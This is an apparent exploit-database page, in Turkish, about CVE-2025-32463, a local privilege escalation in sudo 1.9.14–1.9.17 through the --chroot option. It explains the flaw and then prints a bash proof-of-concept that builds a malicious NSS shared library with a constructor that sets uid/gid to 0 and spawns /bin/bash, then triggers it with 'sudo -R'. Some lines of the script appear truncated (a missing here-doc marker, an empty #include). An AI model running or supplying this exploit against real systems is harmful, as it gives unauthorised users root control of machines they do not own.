Share
## https://sploitus.com/exploit?id=4369C109-0575-5506-9251-C309214995D2
# 📌 CVE-2025-32463 — Sudo `--chroot` Local Privilege Escalation
**ExploitDB ID:** 52352
---
## 🧠 Genel Bakış
Bu repo, **Sudo 1.9.14 – 1.9.17** sürümlerini etkileyen kritik bir **yerel yetki yükseltme (LPE)** zafiyetini belgelemektedir.
Zafiyet, `sudo -R (--chroot)` seçeneğinin hatalı uygulanmasından kaynaklanır ve **sudoers dosyasında izinli olmasa bile**, saldırganın **root yetkisiyle komut çalıştırmasına** olanak tanır.
> 🔥 **Sonuç:** Yetkisiz bir kullanıcı → **root shell**
---
## 🧩 Etkilenen Bileşen
- **Yazılım:** sudo
- **Etkilenen Sürümler:**
- 1.9.14
- 1.9.15
- 1.9.16
- 1.9.17
- **CVE ID:** CVE-2025-32463
- **Platform:** Linux (özellikle NSS kullanan sistemler)
- **Test Edilen Sistem:** Kali Rolling 2025
---
## ⚙️ Zafiyetin Teknik Nedeni
Sudo’nun `--chroot` (`-R`) parametresi, kullanıcıya **kendi belirlediği bir root dizini altında komut çalıştırma** yetkisi tanır.
Ancak **sudo 1.9.14** ile yapılan bir değişiklik sonucu:
- `sudoers` dosyası **henüz tam doğrulanmadan**
- `chroot()` çağrısı **kullanıcının belirttiği dizin üzerinden** yapılmaktadır
Bu durum, saldırganın kendi oluşturduğu sahte bir:
``` /etc/nsswitch.conf ```
dosyası aracılığıyla **kötü niyetli bir NSS kütüphanesini (`libnss_*.so`) root yetkisiyle yükletmesine** neden olur.
---
## 🧨 Saldırı Senaryosu (Özet)
1. Geçici bir dizin oluşturulur
2. Sahte bir `nsswitch.conf` hazırlanır
3. Kötü amaçlı bir NSS shared library derlenir
4. `sudo -R ` çağrısı yapılır
5. NSS library **root yetkisiyle yüklenir**
6. **Root shell elde edilir** 🚀
---
## 🧪 Proof of Concept (PoC)
> ⚠️ **Yalnızca eğitim ve test ortamlarında kullanınız**
```bash
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
cat > woot1337.c
#include
__attribute__((constructor))
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash","/bin/bash",NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
sudo -R woot woot